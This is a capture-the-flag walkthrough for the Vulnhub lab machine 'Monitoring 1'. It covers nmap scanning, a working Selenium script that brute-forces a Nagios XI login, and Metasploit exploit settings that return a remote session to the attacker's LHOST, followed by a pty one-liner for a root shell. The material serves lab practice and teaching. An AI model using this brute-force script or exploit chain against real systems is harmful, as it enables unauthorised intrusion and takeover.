Vulnhub: Monitoring 1 – CTF

Hello cyberman!

This article is about a CTF (Capture The Flag). The vulnerable machine is named “Monitoring 1”.

This CTF is level 1. The machine runs Ubuntu as its operating system.
A CTF is like a game: there is a vulnerable machine and you crack it.
For this you first need the following:

First install “Monitoring 1” in VMware, then install Kali Linux in VMware. If you don’t know how to install them, this article is not about “How to install a virtual machine”; please search for that on Google.

If you are ready, I will start. I run Kali Linux in VMware, then scan the network to find the target’s IP address. At a basic level there are two ways to do this:
1- Nmap
2- Netdiscover
I usually use nmap.
First of all, which network are we located in? The command to find out:

$ ifconfig

An example result is shown in the picture above. Okay, now we know. We need to scan the range 192.168.1.0-255. Now we enter this command in the terminal:

$ nmap 192.168.1.0/24

Okay, now we know the IP address of the target machine, as seen in the picture below.

Now we need a detailed scan.
Enter this command in the terminal:

$  sudo nmap 192.168.1.64 -A -sV -sF -Pn

Okay, now we have the details of the machine. The scan result is below.

As seen in this picture, a Nagios service is running on this machine. That is nice. OK, let’s look at its web page. Open Firefox in Kali Linux and enter in the URL bar: 192.168.1.64 (or whatever your target’s IP address is). There is a web address that directs you to a login panel.

Now… I tried SQL injection with sqlmap and Burp Suite, but there is no SQL injection in the login page. So I thought of a different way. There is a way; I know that definitely. And a solution occurred to me: brute force. 🙂
Yes, I know, it’s a bad way. But I didn’t find another way.

We need two pieces of information:
1- User name
2- Password

This is a CTF, and wordlists usually contain the passwords, so I have a way for that. Okay, now I need the user name. The first guesses are usually “admin”, “administrator”, etc. But I think not.

Now we do a little search on the internet. Search Google for something like: “What is the usual username for the Nagios service.”

Yes, I found it. The username is “nagiosadmin”. Now it’s time to try.

Now we need a way to brute force.
I tried the hacking tools below:

  • Burp Suite
  • Hydra

But they didn’t produce results, because Burp Suite is very slow and Hydra was not working. I guess I couldn’t get it to work.

Then I thought about it and said, “I will write an attack tool myself with Python.” I decided.
And I wrote it.

My code is below:

from selenium import webdriver
from selenium.webdriver.firefox.service import Service
from webdriver_manager.firefox import GeckoDriverManager
from bs4 import BeautifulSoup

# Selenium 4 takes the geckodriver path through a Service object
driver = webdriver.Firefox(service=Service(GeckoDriverManager().install()))
driver.get("http://192.168.1.64/nagiosxi/login.php")

# The user name is typed once; only the password changes per attempt
inputElement = driver.find_element("id", "usernameBox")
inputElement.send_keys("nagiosadmin")
tryNumber = 1

with open("pass.list", "r") as wordlist:
    for passi in wordlist:
        passtxt = passi.strip()
        inputElement = driver.find_element("id", "passwordBox")
        inputElement.send_keys(passtxt)
        button = driver.find_element("id", "loginButton")
        button.click()
        # A failed login renders a <ul class="errorMessage"> element
        soup = BeautifulSoup(driver.page_source, "html.parser")
        check = soup.find_all("ul", {"class": "errorMessage"})

        if check:
            print(str(tryNumber) + " [-] Try: " + passtxt + " / Result: " + check[0].text.strip())
        else:
            # No error message on the page: the login was accepted
            print(str(tryNumber) + " [+] I found this password: " + passtxt)
            break
        tryNumber = tryNumber + 1

This code requires:

  • The Selenium library
  • The webdriver_manager library
  • The BS4 / BeautifulSoup library
  • A wordlist. I used a ready-made wordlist. Its path: “/usr/share/wordlists/john.lst”

And finally I found it. It is like a joke: the password is “admin”.

Now we need a wonderful tool named metasploit-framework. Type “msfconsole” in the terminal and press enter. msf starts.

Now we search for nagios in msf. The result list is like the picture below.

Okay, now we need to choose an exploit. I selected “exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce”. To select it I typed “use exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce” and pressed enter.

Okay, now we have selected the exploit.
Next we configure it. I typed “show options” and pressed enter. That shows the options for us.

Enter the following commands to edit the options:

set PASSWORD admin <press enter>
set LHOST <your ip address> <press enter>
set RHOSTS <target ip address, 192.168.1.64 is mine.> <press enter>

And then the magic word… type “exploit” and hit enter.

Now we need to open a shell. We have established the connection with Meterpreter.
Type “shell” and press enter.

And then enter this command: python -c 'import pty;pty.spawn("/bin/bash")'

What we do here is establish a connection to a terminal on the target system: the Python one-liner spawns an interactive bash on a pseudo-terminal, and that shell has root rights.

For example, as below:

And then press enter.

root@ubuntu:/usr/local/nagiosxi/html/includes/components/profile# 

A prompt like the one above will appear, and we have become the system administrator by accessing this system from outside.
If you want to grab the flag, type the command “cd /root” and hit enter, then read the .TXT file.

Have a nice day with lots of informatics. 🙂
